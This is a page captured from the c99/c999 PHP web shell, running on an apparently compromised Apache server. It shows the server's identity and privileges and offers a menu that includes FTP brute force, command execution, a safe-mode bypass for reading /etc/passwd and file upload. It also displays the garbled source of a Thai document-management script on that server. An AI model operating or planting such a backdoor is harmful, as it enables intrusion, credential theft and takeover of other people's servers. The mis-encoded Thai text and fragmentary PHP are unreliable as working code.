!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showReceiveDoc.php (29.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchMaxDocGroup(); if($DLCID && $one_position!="1"){ include_once "selectposition.php"; ?> SearchByKey($DLCID); $oDlc->GetRecord(); $oDoc->SearchByKey($DocID); $oDoc->GetRecord(); $oRs5->SearchByKey($DrsID);$oRs5->GetRecord(); //echo $DLCID."
"; //echo $oDlc->personId; ?>
">˹ѧÊ×Íà¢éÒ/ŧÃѺ ÃÒÂÅÐàÍÕ´¢éÍÁÙÅ·ÐàºÕ¹˹ѧÊ×Í
" size="3">¡ÒÃŧ·ÐàºÕ¹ÃѺ˹ѧÊ×Í
ŧ·ÐàºÕ¹
">
" size="2">  ÃÒÂÅÐàÍÕ´¢Í§Ë¹Ñ§Ê×Í: " size="2"> SearchShowRsName(1); }else if($RsID==2){ echo $oRSt->SearchShowRsName(2); }else if($oDoc->RsID==3){ echo $oRSt->SearchShowRsName(3); }else if($RsID==4){ echo $oRSt->SearchShowRsName(4); } ?>   " size="2">  ª¹Ô´Ë¹Ñ§Ê×Í: " size="2"> SearchByKey($DtID); $oDt->GetRecord(); echo $oDt->DtName; ?>
DtID==3 || $DtID==14 || $DtID==15){?> DocforSign=="Y"){ ?> sendToPs=="Y"){ ?>
 
">   : "> DtID!="15"){ if($oDoc->DocNo!=""){ echo $oDoc->DocNo; } }else{ echo '-';} ?>
">   :"> DocDate!="" && $oDoc->DocDate!="0000-00-00"){ echo " ".abbreDate2($oDoc->DocDate,'/'); } ?>
" >   :"> DocSubject!=""){ echo $oDoc->DocSubject; } ?>
">   : "> DocFrom!=""){ echo $oDoc->DocFrom; } ?>
">  ª×èͼÙéä´éÃѺ¡ÒÃÃѺÃͧ : "> CertificatePs!=""){ echo $oDoc->CertificatePs; } ?>
">   : "> DocTo!=""){ echo $oDoc->DocTo; }?>
">  á¿éÁ˹ѧÊ×Í : "> DocPID=="0" || $oDoc->DocPID==""){ $searchDoc=$oDoc->DocID; }else{ $searchDoc=$oDoc->DocPID; }?> ">   á¿éÁ·Õèà¡ÕèÂÇ¢éͧ CountDocByDocID($searchDoc); ?> ÃÒ¡ÒÃ
 SearchByDocID($searchDoc); while($oDatt->GetRecord()){ $c++; $pathfile="../documents/".$oDatt->DaUpFileName; ?>  à»Ô´´Ùá¿éÁ˹ѧÊ×Í  DaFileName."
"; } ?>
">  ÍéÒ§¶Ö§ :"> DocRef!=""){ echo $oDoc->DocRef; } ?>
">  ÊÔ觷ÕèÊè§ÁÒ´éÇ :"> DocOther!=""){ echo $oDoc->DocOther; }?>
">  ÍéÒ§¶Ö§Ë¹Ñ§Ê×Íà¾×è͵ͺ¡ÅѺ :"> DocRefAns!=""){ echo $oDoc->DocRefAns; } ?>
">  ªÑ鹤ÇÒÁàÃçÇ : "> SearchByKey($oDoc->DslID); $oDsl->GetRecord(); echo " ".$oDsl->DslName;?>
">  ªÑ鹤ÇÒÁÅѺ :"> SearchByKey($oDoc->DclID); $oDcl->GetRecord(); echo " ".$oDcl->DclName;?>
">  ËÁÒÂà赯 : "> DocShortDesc!=""){ echo " ".$oDoc->DocShortDesc; } ?>
    ŧ·ÐàºÕ¹˹ѧÊ×Íŧ¹ÒÁ
    Ê觴èǹ
 
RsID=="3"){ if($oDlc->DlcView=="Y"){ $lineDoc=GetLineDoc($DocID,$oDoc->DocGroup,$oDoc->DsID,$DrsID); $checkshow=0; if($lineDoc!=$DrsID){ $lineDoc=$lineDoc.$oRs5->DrsID; $checkshow=1;} //echo "=".$lineDoc."
"; ?>
  
" size="2"> àÊé¹·Ò§à´Ô¹¢Í§Ë¹Ñ§Ê×Í¢éÍÁÙÅ¡ÒÃŧÃѺ˹ѧÊ×Í

SearchByKey($line); $oRs2->GetRecord(); $oDoc2->SearchByKey($oRs2->DocID); $oDoc2->GetRecord(); $oDlc3->SearchByKey($oDoc2->DlcID); $oDlc3->GetRecord(); if($oRs2->DsID=="1"){ ?>
  ¢éÍÁÙÅ¡ÒÃŧÃѺ¢Í§Ë¹èǧҹ SearchByKey($oDlc3->deptId); $oDP->GetRecord(); echo $oDP->deptName;?>
  ª¹Ô´Ë¹Ñ§Ê×Í : SearchByKey($oDoc2->DtID); $oDt->GetRecord(); echo $oDt->DtName; ?> àÅ¢·ÐàºÕ¹RsID);?> : DocTypeNo);?> Çѹ·Õèŧ·ÐàºÕ¹ : DocDateCreate); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
  Å§ÃѺâ´Â : SearchByKey($oRs2->DrsReceivePersonId); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName; ?> SearchByKey($oDlc3->DlpID); $oDlp->GetRecord(); echo " (".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->deptName).")"; ?>
DsID=="2"){ ?> SearchByKey($oRs2->DrsFromDrsID); $oRs3->GetRecord(); ?>
  ¢éÍÁÙÅ¡ÒÃàʹÍŧ¹ÒÁ
">  ¡Òúѹ·Ö¡µèÍà¹×èͧ : "> DrsPropose); ?>
">  ¼ÙéàʹÍŧ¹ÒÁ : " align="center"> SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs2->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate ); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
DrsWSign=='Y'){ //case DrsWSign $oDws->SearchByDrsIDDocID($oRs2->DrsID,$oRs2->DocID); $oDws->GetRecord(); ?>
  ¢éÍÁÙÅ¡ÒÃÃÍàʹͼ͡./˹.
">  ¡Òúѹ·Ö¡µèÍà¹×èͧ : "> DocSign); ?>
">  ¼Ùéŧ¹ÒÁ : " align="center"> SearchByKey($oDws->personId); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oDws->DlcID); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oDws->signDateTime); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
DsID=="3"){ $oRs4->SearchByKey($oRs2->DrsFromDrsID); $oRs4->GetRecord(); if($oRs4->DrsByPass!="Y"){ ?>
  ¢éÍÁÙÅ¡ÒÃŧ¹ÒÁ
">  ¡Òúѹ·Ö¡µèÍà¹×èͧ : "> DrsSign); ?>
">  ¼Ùéŧ¹ÒÁ : " align="center"> SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs2->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate ); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
DsID=="0" || $oRs2->DsID=="4" || $oRs2->DsID=="5"){ ?> DrsSendDate!="0000-00-00 00-00-00"){ //show status=3 send to person ?> SearchByKey($oRs2->DrsID); $oRs6->GetRecord(); ?> PtID!=0 && $oRs6->PtID!=""){ $oPt->SearchByKey($oRs6->PtID); $oPt->GetRecord(); ?> DrsSendDocNew!="0000-00-00 00:00:00"){ ?> AnID!=0 && $oRs6->AnID!=""){ $oAn->SearchByKey($oRs6->AnID); $oAn->GetRecord(); ?> SearchByKey($oRs6->DocID); $oDoc3->GetRecord(); if($oRs6->DrsDocDueDate!="0000-00-00"){ ?>
  ¢éÍÁÙÅ¡ÒÃÊ觶֧¼ÙéÃѺ¼Ô´ªÍº
">  Êè§à¾ÔèÁàµÔÁ : ">    DrsSendDocNew); echo abbreDate2($DocD2,'/')." ".a2th($DocT2); ?>
">  ÅѡɳÐ˹ѧÊ×Í : ">    PtName; ?>
">  ¢éÍÁÙÅ¢Öé¹àÇçº : ">    AnName; ?>
    á¨é§¢Öé¹àÇ纠DocShowInOut); ?>
    Çѹ·Õè»ÃСÒÈ¢Öé¹àÇ纠 DrsstartDatePost!="0000-00-00"){ if($oRs6->DrsstartDatePost==$oRs6->DrsendDatePost){ echo abbreDate2($oRs6->DrsstartDatePost,'/'); }else{ echo abbreDate2($oRs6->DrsstartDatePost,'/')." ¶Ö§ ".abbreDate2($oRs6->DrsendDatePost,'/'); } } ?>
">  ¡Òúѹ·Ö¡µèÍà¹×èͧ : "> DrsPropose); ?>
">  ¼ÙéÊè§Ë¹Ñ§Ê×Í : " align="center"> SearchByKey($oRs6->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs6->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; $oRs8->SearchByKey($oRs6->DrsFromDrsID); $oRs8->GetRecord(); list($DocD,$DocT) = split(' ',$oRs8->DrsSendDate); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
">  ¡Ó˹´ÃÐÂÐàÇÅÒ´Óà¹Ô¹¡Òà : ">    ÀÒÂã¹Çѹ·Õè DrsDocDueDate,'/');?>
 

">   á¨é§¡ÒÃÊ觼Դ
"> ¤ÓªÕéᨧ :: DlcActive!='Y'){ echo "disabled"; } ?>>           

DlcActive!='Y'){ echo "disabled"; } ?>> DlcActive!='Y'){ echo "disabled"; } ?>>   
" size="2"> ËÁÒÂà赯 :   " size="2">¤ÅÔ¡à¾×èÍà»Ô´´Ùá¿éÁ˹ѧÊ×Í
  " size="2"> 

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--